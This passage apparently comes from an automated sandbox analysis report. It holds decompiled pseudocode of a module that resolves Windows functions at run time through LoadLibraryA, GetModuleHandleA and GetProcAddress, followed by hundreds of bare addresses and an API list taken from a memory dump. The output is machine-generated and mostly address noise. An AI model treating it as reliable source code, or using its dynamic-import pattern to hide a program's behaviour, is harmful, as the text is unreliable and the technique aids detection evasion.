                                                                                                                                                                            					_t215 =  *_t317 - 1;
                                                                                                                                                                            					if(_t215 == 0) {
                                                                                                                                                                            						_t178 = _t317 + 8; // 0x8
                                                                                                                                                                            						_t311 = _t178;
                                                                                                                                                                            						__eflags =  *_t311;
                                                                                                                                                                            						if( *_t311 != 0) {
                                                                                                                                                                            							_t216 = GetModuleHandleA(_t311);
                                                                                                                                                                            							__eflags = _t216 - _t283;
                                                                                                                                                                            							 *(_t317 + 0x808) = _t216;
                                                                                                                                                                            							if(_t216 != _t283) {
                                                                                                                                                                            								L150:
                                                                                                                                                                            								_t183 = _t317 + 0x408; // 0x408
                                                                                                                                                                            								_t312 = _t183;
                                                                                                                                                                            								_t217 = E100015A4( *(_t317 + 0x808), _t312);
                                                                                                                                                                            								__eflags = _t217 - _t283;
                                                                                                                                                                            								 *(_t317 + 0x80c) = _t217;
                                                                                                                                                                            								if(_t217 == _t283) {
                                                                                                                                                                            									__eflags =  *_t312 - 0x23;
                                                                                                                                                                            									if( *_t312 == 0x23) {
                                                                                                                                                                            										_t186 = _t317 + 0x409; // 0x409
                                                                                                                                                                            										_t221 = E100012FE(_t186);
                                                                                                                                                                            										__eflags = _t221 - _t283;
                                                                                                                                                                            										if(_t221 != _t283) {
                                                                                                                                                                            											__eflags = _t221 & 0xffff0000;
                                                                                                                                                                            											if((_t221 & 0xffff0000) == 0) {
                                                                                                                                                                            												 *(_t317 + 0x80c) = GetProcAddress( *(_t317 + 0x808), _t221 & 0x0000ffff);
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								__eflags = _v48 - _t283;
                                                                                                                                                                            								if(_v48 != _t283) {
                                                                                                                                                                            									L157:
                                                                                                                                                                            									_t312[lstrlenA(_t312)] = 0x41;
                                                                                                                                                                            									_t219 = E100015A4( *(_t317 + 0x808), _t312);
                                                                                                                                                                            									__eflags = _t219 - _t283;
                                                                                                                                                                            									if(_t219 != _t283) {
                                                                                                                                                                            										L145:
                                                                                                                                                                            										 *(_t317 + 0x80c) = _t219;
                                                                                                                                                                            										goto L161;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(_t317 + 0x80c) - _t283;
                                                                                                                                                                            									L159:
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										goto L161;
                                                                                                                                                                            									}
                                                                                                                                                                            									L160:
                                                                                                                                                                            									_t196 = _t317 + 4;
                                                                                                                                                                            									 *_t196 =  *(_t317 + 4) | 0xffffffff;
                                                                                                                                                                            									__eflags =  *_t196;
                                                                                                                                                                            									goto L161;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									__eflags =  *(_t317 + 0x80c) - _t283;
                                                                                                                                                                            									if( *(_t317 + 0x80c) != _t283) {
                                                                                                                                                                            										goto L161;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L157;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t224 = LoadLibraryA(_t311);
                                                                                                                                                                            							__eflags = _t224 - _t283;
                                                                                                                                                                            							 *(_t317 + 0x808) = _t224;
                                                                                                                                                                            							if(_t224 == _t283) {
                                                                                                                                                                            								goto L160;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L150;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t179 = _t317 + 0x408; // 0x408
                                                                                                                                                                            						_t226 = E100012FE(_t179);
                                                                                                                                                                            						 *(_t317 + 0x80c) = _t226;
                                                                                                                                                                            						__eflags = _t226 - _t283;
                                                                                                                                                                            						goto L159;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t227 = _t215 - 1;
                                                                                                                                                                            					if(_t227 == 0) {
                                                                                                                                                                            						_t176 = _t317 + 0x408; // 0x408
                                                                                                                                                                            						_t228 = _t176;
                                                                                                                                                                            						__eflags =  *_t228;
                                                                                                                                                                            						if( *_t228 == 0) {
                                                                                                                                                                            							goto L161;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t219 = E100012FE(_t228);
                                                                                                                                                                            						L144:
                                                                                                                                                                            						goto L145;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t227 != 1) {
                                                                                                                                                                            						goto L161;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t80 = _t317 + 8; // 0x8
                                                                                                                                                                            					_t284 = _t80;
                                                                                                                                                                            					_t313 = E100012FE(_t80);
                                                                                                                                                                            					 *(_t317 + 0x808) = _t313;
                                                                                                                                                                            					if(_t313 == 0) {
                                                                                                                                                                            						goto L160;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t317 + 0x84c) =  *(_t317 + 0x84c) & 0x00000000;
                                                                                                                                                                            					 *((intOrPtr*)(_t317 + 0x850)) = E10001224(_t284);
                                                                                                                                                                            					 *(_t317 + 0x83c) =  *(_t317 + 0x83c) & 0x00000000;
                                                                                                                                                                            					 *((intOrPtr*)(_t317 + 0x848)) = 1;
                                                                                                                                                                            					 *((intOrPtr*)(_t317 + 0x838)) = 1;
                                                                                                                                                                            					_t89 = _t317 + 0x408; // 0x408
                                                                                                                                                                            					_t219 =  *(_t313->i + E100012FE(_t89) * 4);
                                                                                                                                                                            					goto L144;
                                                                                                                                                                            				}
                                                                                                                                                                            			}
































































                                                                                                                                                                            0x10001a65
                                                                                                                                                                            0x10001a68
                                                                                                                                                                            0x10001a6b
                                                                                                                                                                            0x10001a6e
                                                                                                                                                                            0x10001a71
                                                                                                                                                                            0x10001a74
                                                                                                                                                                            0x10001a77
                                                                                                                                                                            0x10001a79
                                                                                                                                                                            0x10001a7c
                                                                                                                                                                            0x10001a81
                                                                                                                                                                            0x10001a84
                                                                                                                                                                            0x10001a8c
                                                                                                                                                                            0x10001a94
                                                                                                                                                                            0x10001a96
                                                                                                                                                                            0x10001a99
                                                                                                                                                                            0x10001aa1
                                                                                                                                                                            0x10001aa1
                                                                                                                                                                            0x10001aa6
                                                                                                                                                                            0x10001aa9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ab3
                                                                                                                                                                            0x10001ab5
                                                                                                                                                                            0x10001aba
                                                                                                                                                                            0x10001abc
                                                                                                                                                                            0x10001b2e
                                                                                                                                                                            0x10001b2e
                                                                                                                                                                            0x10001b2e
                                                                                                                                                                            0x10001b32
                                                                                                                                                                            0x10001b35
                                                                                                                                                                            0x10001b37
                                                                                                                                                                            0x10001b59
                                                                                                                                                                            0x10001b5c
                                                                                                                                                                            0x10001b5e
                                                                                                                                                                            0x10001b67
                                                                                                                                                                            0x10001b6d
                                                                                                                                                                            0x10001b6f
                                                                                                                                                                            0x10001b75
                                                                                                                                                                            0x10001b75
                                                                                                                                                                            0x10001b7b
                                                                                                                                                                            0x10001b7e
                                                                                                                                                                            0x10001b7e
                                                                                                                                                                            0x10001b81
                                                                                                                                                                            0x10001b81
                                                                                                                                                                            0x10001b87
                                                                                                                                                                            0x10001b89
                                                                                                                                                                            0x10001b8c
                                                                                                                                                                            0x10001b92
                                                                                                                                                                            0x10001b95
                                                                                                                                                                            0x10001b95
                                                                                                                                                                            0x10001b97
                                                                                                                                                                            0x10001b9d
                                                                                                                                                                            0x10001ba0
                                                                                                                                                                            0x10001bc4
                                                                                                                                                                            0x10001bc7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001bca
                                                                                                                                                                            0x10001bcc
                                                                                                                                                                            0x10001bda
                                                                                                                                                                            0x10001bdd
                                                                                                                                                                            0x10001bdf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001be1
                                                                                                                                                                            0x10001be1
                                                                                                                                                                            0x10001be1
                                                                                                                                                                            0x10001be7
                                                                                                                                                                            0x10001be9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001beb
                                                                                                                                                                            0x10001bed
                                                                                                                                                                            0x10001bef
                                                                                                                                                                            0x10001bf1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001bf1
                                                                                                                                                                            0x10001bf3
                                                                                                                                                                            0x10001bf5
                                                                                                                                                                            0x10001bf7
                                                                                                                                                                            0x10001bf7
                                                                                                                                                                            0x10001bfd
                                                                                                                                                                            0x10001c03
                                                                                                                                                                            0x10001c05
                                                                                                                                                                            0x10001c19
                                                                                                                                                                            0x10001c19
                                                                                                                                                                            0x10001c1b
                                                                                                                                                                            0x10001c07
                                                                                                                                                                            0x10001c0d
                                                                                                                                                                            0x10001c10
                                                                                                                                                                            0x10001c10
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ba2
                                                                                                                                                                            0x10001ba2
                                                                                                                                                                            0x10001ba2
                                                                                                                                                                            0x10001ba3
                                                                                                                                                                            0x10001bab
                                                                                                                                                                            0x10001baf
                                                                                                                                                                            0x10001bb5
                                                                                                                                                                            0x10001bb9
                                                                                                                                                                            0x10001c21
                                                                                                                                                                            0x10001c24
                                                                                                                                                                            0x10001c27
                                                                                                                                                                            0x10001cb1
                                                                                                                                                                            0x10001cb5
                                                                                                                                                                            0x10001a9e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001a9e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001cb5
                                                                                                                                                                            0x10001ba5
                                                                                                                                                                            0x10001ba5
                                                                                                                                                                            0x10001ba6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ba8
                                                                                                                                                                            0x10001ba9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ba9
                                                                                                                                                                            0x10001ba0
                                                                                                                                                                            0x10001b3a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001b43
                                                                                                                                                                            0x10001b46
                                                                                                                                                                            0x10001b53
                                                                                                                                                                            0x10001b53
                                                                                                                                                                            0x10001b48
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001b48
                                                                                                                                                                            0x10001abe
                                                                                                                                                                            0x10001ac1
                                                                                                                                                                            0x10001b12
                                                                                                                                                                            0x10001b15
                                                                                                                                                                            0x10001b26
                                                                                                                                                                            0x10001b26
                                                                                                                                                                            0x10001b29
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001b29
                                                                                                                                                                            0x10001b17
                                                                                                                                                                            0x10001b1b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001b1d
                                                                                                                                                                            0x10001b20
                                                                                                                                                                            0x10001c2f
                                                                                                                                                                            0x10001c32
                                                                                                                                                                            0x10001c32
                                                                                                                                                                            0x10001c34
                                                                                                                                                                            0x10001f7a
                                                                                                                                                                            0x10001f7d
                                                                                                                                                                            0x10001fe0
                                                                                                                                                                            0x10001ca2
                                                                                                                                                                            0x10001ca5
                                                                                                                                                                            0x10001ca8
                                                                                                                                                                            0x10001cab
                                                                                                                                                                            0x10001cab
                                                                                                                                                                            0x10001cad
                                                                                                                                                                            0x10001cad
                                                                                                                                                                            0x10001cad
                                                                                                                                                                            0x10001cae
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001cae
                                                                                                                                                                            0x10001f7f
                                                                                                                                                                            0x10001f82
                                                                                                                                                                            0x10001f8e
                                                                                                                                                                            0x10001f8e
                                                                                                                                                                            0x10001f91
                                                                                                                                                                            0x10001f94
                                                                                                                                                                            0x10001f9f
                                                                                                                                                                            0x10001f9f
                                                                                                                                                                            0x10001fa2
                                                                                                                                                                            0x10001fa5
                                                                                                                                                                            0x10001fec
                                                                                                                                                                            0x10001fef
                                                                                                                                                                            0x10001ff2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ff2
                                                                                                                                                                            0x10001fa7
                                                                                                                                                                            0x10001faa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001fac
                                                                                                                                                                            0x10001fb3
                                                                                                                                                                            0x10001fb3
                                                                                                                                                                            0x10001fb9
                                                                                                                                                                            0x10001fbc
                                                                                                                                                                            0x10001fd8
                                                                                                                                                                            0x10001fbe
                                                                                                                                                                            0x10001fc7
                                                                                                                                                                            0x10001fca
                                                                                                                                                                            0x10001fca
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001fbc
                                                                                                                                                                            0x10001f96
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f96
                                                                                                                                                                            0x10001f84
                                                                                                                                                                            0x10001f87
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f89
                                                                                                                                                                            0x10001f8c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f8c
                                                                                                                                                                            0x10001c3a
                                                                                                                                                                            0x10001c3a
                                                                                                                                                                            0x10001c3b
                                                                                                                                                                            0x10001d6a
                                                                                                                                                                            0x10001d6a
                                                                                                                                                                            0x10001d6f
                                                                                                                                                                            0x10001d72
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001d7f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f22
                                                                                                                                                                            0x10001f25
                                                                                                                                                                            0x10001f28
                                                                                                                                                                            0x10001f28
                                                                                                                                                                            0x10001f29
                                                                                                                                                                            0x10001f2c
                                                                                                                                                                            0x10001f2e
                                                                                                                                                                            0x10001f30
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f32
                                                                                                                                                                            0x10001f32
                                                                                                                                                                            0x10001f35
                                                                                                                                                                            0x10001f47
                                                                                                                                                                            0x10001f4a
                                                                                                                                                                            0x10001f53
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f53
                                                                                                                                                                            0x10001f37
                                                                                                                                                                            0x10001f37
                                                                                                                                                                            0x10001f39
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f3b
                                                                                                                                                                            0x10001f3d
                                                                                                                                                                            0x10001f3f
                                                                                                                                                                            0x10001f3f
                                                                                                                                                                            0x10001f3f
                                                                                                                                                                            0x10001f40
                                                                                                                                                                            0x10001f42
                                                                                                                                                                            0x10001f44
                                                                                                                                                                            0x10001f28
                                                                                                                                                                            0x10001f29
                                                                                                                                                                            0x10001f2c
                                                                                                                                                                            0x10001f2e
                                                                                                                                                                            0x10001f30
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f30
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001dc6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001dd2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001db9
                                                                                                                                                                            0x10001dbd
                                                                                                                                                                            0x10001dc1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ef4
                                                                                                                                                                            0x10001ef8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001efe
                                                                                                                                                                            0x10001f06
                                                                                                                                                                            0x10001f0d
                                                                                                                                                                            0x10001f15
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001e91
                                                                                                                                                                            0x10001e91
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ddb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f72
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f62
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f66
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f6e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001eb4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001e99
                                                                                                                                                                            0x10001e9b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ebc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ea1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ea5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f6a
                                                                                                                                                                            0x10001f74
                                                                                                                                                                            0x10001f74
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ec4
                                                                                                                                                                            0x10001ec8
                                                                                                                                                                            0x10001ecd
                                                                                                                                                                            0x10001ed0
                                                                                                                                                                            0x10001ed1
                                                                                                                                                                            0x10001ed4
                                                                                                                                                                            0x10001eda
                                                                                                                                                                            0x10001eda
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001f5a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ea9
                                                                                                                                                                            0x10001eac
                                                                                                                                                                            0x10001eae
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001de2
                                                                                                                                                                            0x10001de2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001eb8
                                                                                                                                                                            0x10001ebe
                                                                                                                                                                            0x10001ebe
                                                                                                                                                                            0x10001de4
                                                                                                                                                                            0x10001de4
                                                                                                                                                                            0x10001de7
                                                                                                                                                                            0x10001dee
                                                                                                                                                                            0x10001df1
                                                                                                                                                                            0x10001df3
                                                                                                                                                                            0x10001df5
                                                                                                                                                                            0x10001df6
                                                                                                                                                                            0x10001dfa
                                                                                                                                                                            0x10001dfd
                                                                                                                                                                            0x10001e03
                                                                                                                                                                            0x10001e09
                                                                                                                                                                            0x10001e09
                                                                                                                                                                            0x10001e0b
                                                                                                                                                                            0x10001e0b
                                                                                                                                                                            0x10001e0e
                                                                                                                                                                            0x10001e14
                                                                                                                                                                            0x10001e16
                                                                                                                                                                            0x10001e1a
                                                                                                                                                                            0x10001e1f
                                                                                                                                                                            0x10001e1f
                                                                                                                                                                            0x10001e21
                                                                                                                                                                            0x10001e21
                                                                                                                                                                            0x10001e24
                                                                                                                                                                            0x10001e27
                                                                                                                                                                            0x10001e30
                                                                                                                                                                            0x10001e33
                                                                                                                                                                            0x10001e36
                                                                                                                                                                            0x10001e36
                                                                                                                                                                            0x10001e38
                                                                                                                                                                            0x10001e3b
                                                                                                                                                                            0x10001e41
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001e41
                                                                                                                                                                            0x10001e05
                                                                                                                                                                            0x10001e07
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001d86
                                                                                                                                                                            0x10001d8c
                                                                                                                                                                            0x10001d8f
                                                                                                                                                                            0x10001d91
                                                                                                                                                                            0x10001d91
                                                                                                                                                                            0x10001d94
                                                                                                                                                                            0x10001d98
                                                                                                                                                                            0x10001da5
                                                                                                                                                                            0x10001da7
                                                                                                                                                                            0x10001dad
                                                                                                                                                                            0x10001dad
                                                                                                                                                                            0x10001dad
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ee2
                                                                                                                                                                            0x10001ee6
                                                                                                                                                                            0x10001eeb
                                                                                                                                                                            0x10001eee
                                                                                                                                                                            0x10001e47
                                                                                                                                                                            0x10001e47
                                                                                                                                                                            0x10001e49
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001e4f
                                                                                                                                                                            0x10001e4f
                                                                                                                                                                            0x10001e53
                                                                                                                                                                            0x10001e5a
                                                                                                                                                                            0x10001e7e
                                                                                                                                                                            0x10001e7e
                                                                                                                                                                            0x10001e82
                                                                                                                                                                            0x10001e84
                                                                                                                                                                            0x10001e87
                                                                                                                                                                            0x10001e87
                                                                                                                                                                            0x10001e8a
                                                                                                                                                                            0x10001e8a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001e82
                                                                                                                                                                            0x10001e5f
                                                                                                                                                                            0x10001e62
                                                                                                                                                                            0x10001e62
                                                                                                                                                                            0x10001e69
                                                                                                                                                                            0x10001e6b
                                                                                                                                                                            0x10001e6e
                                                                                                                                                                            0x10001e75
                                                                                                                                                                            0x10001e76
                                                                                                                                                                            0x10001e7c
                                                                                                                                                                            0x10001e7c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001e7c
                                                                                                                                                                            0x10001e70
                                                                                                                                                                            0x10001e73
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001d7f
                                                                                                                                                                            0x10001c41
                                                                                                                                                                            0x10001c41
                                                                                                                                                                            0x10001c42
                                                                                                                                                                            0x10001d67
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001d67
                                                                                                                                                                            0x10001c48
                                                                                                                                                                            0x10001c49
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001c51
                                                                                                                                                                            0x10001c51
                                                                                                                                                                            0x10001c54
                                                                                                                                                                            0x10001c9f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001c9f
                                                                                                                                                                            0x10001c56
                                                                                                                                                                            0x10001c56
                                                                                                                                                                            0x10001c59
                                                                                                                                                                            0x10001c83
                                                                                                                                                                            0x10001c86
                                                                                                                                                                            0x10001c89
                                                                                                                                                                            0x10001d59
                                                                                                                                                                            0x10001d59
                                                                                                                                                                            0x10001d59
                                                                                                                                                                            0x10001c8f
                                                                                                                                                                            0x10001c8f
                                                                                                                                                                            0x10001c8f
                                                                                                                                                                            0x10001d5f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001d5f
                                                                                                                                                                            0x10001c5c
                                                                                                                                                                            0x10001c5c
                                                                                                                                                                            0x10001c5d
                                                                                                                                                                            0x10001c80
                                                                                                                                                                            0x10001c82
                                                                                                                                                                            0x10001c82
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001c82
                                                                                                                                                                            0x10001c5f
                                                                                                                                                                            0x10001c5f
                                                                                                                                                                            0x10001c62
                                                                                                                                                                            0x10001c7c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001c7c
                                                                                                                                                                            0x10001c64
                                                                                                                                                                            0x10001c64
                                                                                                                                                                            0x10001c67
                                                                                                                                                                            0x10001c78
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001c78
                                                                                                                                                                            0x10001c69
                                                                                                                                                                            0x10001c69
                                                                                                                                                                            0x10001c6a
                                                                                                                                                                            0x10001c74
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001c74
                                                                                                                                                                            0x10001c6d
                                                                                                                                                                            0x10001c6e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001c70
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001c70
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001b20
                                                                                                                                                                            0x10001ac3
                                                                                                                                                                            0x10001ac6
                                                                                                                                                                            0x10001af5
                                                                                                                                                                            0x10001af9
                                                                                                                                                                            0x10001b00
                                                                                                                                                                            0x10001b07
                                                                                                                                                                            0x10001b0a
                                                                                                                                                                            0x10001b0d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001b0d
                                                                                                                                                                            0x10001ac8
                                                                                                                                                                            0x10001ac9
                                                                                                                                                                            0x10001ae4
                                                                                                                                                                            0x10001aeb
                                                                                                                                                                            0x10001aee
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001aee
                                                                                                                                                                            0x10001ace
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001ad4
                                                                                                                                                                            0x10001ad4
                                                                                                                                                                            0x10001adb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001adb
                                                                                                                                                                            0x10001ace
                                                                                                                                                                            0x10001cc4
                                                                                                                                                                            0x10001cc9
                                                                                                                                                                            0x10001cce
                                                                                                                                                                            0x10001cd2
                                                                                                                                                                            0x100020ef
                                                                                                                                                                            0x100020f5
                                                                                                                                                                            0x10001ce4
                                                                                                                                                                            0x10001ce6
                                                                                                                                                                            0x10001ce7
                                                                                                                                                                            0x1000201a
                                                                                                                                                                            0x1000201a
                                                                                                                                                                            0x1000201d
                                                                                                                                                                            0x10002020
                                                                                                                                                                            0x1000203d
                                                                                                                                                                            0x10002043
                                                                                                                                                                            0x10002045
                                                                                                                                                                            0x1000204b
                                                                                                                                                                            0x10002062
                                                                                                                                                                            0x10002062
                                                                                                                                                                            0x10002062
                                                                                                                                                                            0x1000206f
                                                                                                                                                                            0x10002075
                                                                                                                                                                            0x10002078
                                                                                                                                                                            0x1000207e
                                                                                                                                                                            0x10002080
                                                                                                                                                                            0x10002083
                                                                                                                                                                            0x10002085
                                                                                                                                                                            0x1000208c
                                                                                                                                                                            0x10002091
                                                                                                                                                                            0x10002094
                                                                                                                                                                            0x10002096
                                                                                                                                                                            0x1000209b
                                                                                                                                                                            0x100020ad
                                                                                                                                                                            0x100020ad
                                                                                                                                                                            0x1000209b
                                                                                                                                                                            0x10002094
                                                                                                                                                                            0x10002083
                                                                                                                                                                            0x100020b3
                                                                                                                                                                            0x100020b6
                                                                                                                                                                            0x100020c0
                                                                                                                                                                            0x100020c8
                                                                                                                                                                            0x100020d4
                                                                                                                                                                            0x100020da
                                                                                                                                                                            0x100020dd
                                                                                                                                                                            0x1000200f
                                                                                                                                                                            0x1000200f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000200f
                                                                                                                                                                            0x100020e3
                                                                                                                                                                            0x100020e9
                                                                                                                                                                            0x100020e9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020eb
                                                                                                                                                                            0x100020eb
                                                                                                                                                                            0x100020eb
                                                                                                                                                                            0x100020eb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020b8
                                                                                                                                                                            0x100020b8
                                                                                                                                                                            0x100020be
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100020be
                                                                                                                                                                            0x100020b6
                                                                                                                                                                            0x1000204e
                                                                                                                                                                            0x10002054
                                                                                                                                                                            0x10002056
                                                                                                                                                                            0x1000205c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000205c
                                                                                                                                                                            0x10002022
                                                                                                                                                                            0x10002029
                                                                                                                                                                            0x1000202f
                                                                                                                                                                            0x10002035
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002035
                                                                                                                                                                            0x10001ced
                                                                                                                                                                            0x10001cee
                                                                                                                                                                            0x10001ff9
                                                                                                                                                                            0x10001ff9
                                                                                                                                                                            0x10001fff
                                                                                                                                                                            0x10002002
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002009
                                                                                                                                                                            0x1000200e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000200e
                                                                                                                                                                            0x10001cf5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001cfb
                                                                                                                                                                            0x10001cfb
                                                                                                                                                                            0x10001d04
                                                                                                                                                                            0x10001d09
                                                                                                                                                                            0x10001d0f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001d15
                                                                                                                                                                            0x10001d22
                                                                                                                                                                            0x10001d28
                                                                                                                                                                            0x10001d32
                                                                                                                                                                            0x10001d38
                                                                                                                                                                            0x10001d40
                                                                                                                                                                            0x10001d50
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001d50

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
                                                                                                                                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
                                                                                                                                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001BCC
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1202605160.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
